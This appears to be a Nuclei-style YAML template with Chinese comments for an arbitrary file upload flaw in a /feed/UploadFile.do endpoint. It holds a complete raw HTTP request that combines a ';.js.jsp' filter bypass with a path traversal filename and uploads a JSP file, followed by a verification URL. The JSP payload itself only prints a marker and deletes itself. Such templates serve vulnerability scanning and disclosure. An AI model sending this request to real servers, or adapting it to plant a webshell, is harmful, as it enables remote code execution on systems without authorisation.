YAML脚本:
id: file-upload-feed
info:
name: Arbitrary File Upload in /feed/UploadFile.do
author: your_name
severity: high
description: Detects arbitrary file upload vulnerability in /feed/UploadFile.do endpoint, allowing an attacker to upload and execute malicious JSP files.
tags: file-upload, rce, jsp
requests:
- raw:
- |
POST /feed/UploadFile.do;.js.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxegqoxxi
Connection: close
------WebKitFormBoundaryxegqoxxi
Content-Disposition: form-data; name="file"; filename="/../../../../rce.jsp"
Content-Type: image/jpeg
<%@ page import="java.io.File" %>
<%
out.println("pppppppppoooooooocccccccccccc");
String filePath = application.getRealPath(request.getServletPath());
new File(filePath).delete();
%>
------WebKitFormBoundaryxegqoxxi--
matchers:
- type: word
words:
- 'rce.jsp' # 检查响应中是否包含
part: body
上传成功
验证url
/rce.jsp;.js.jsp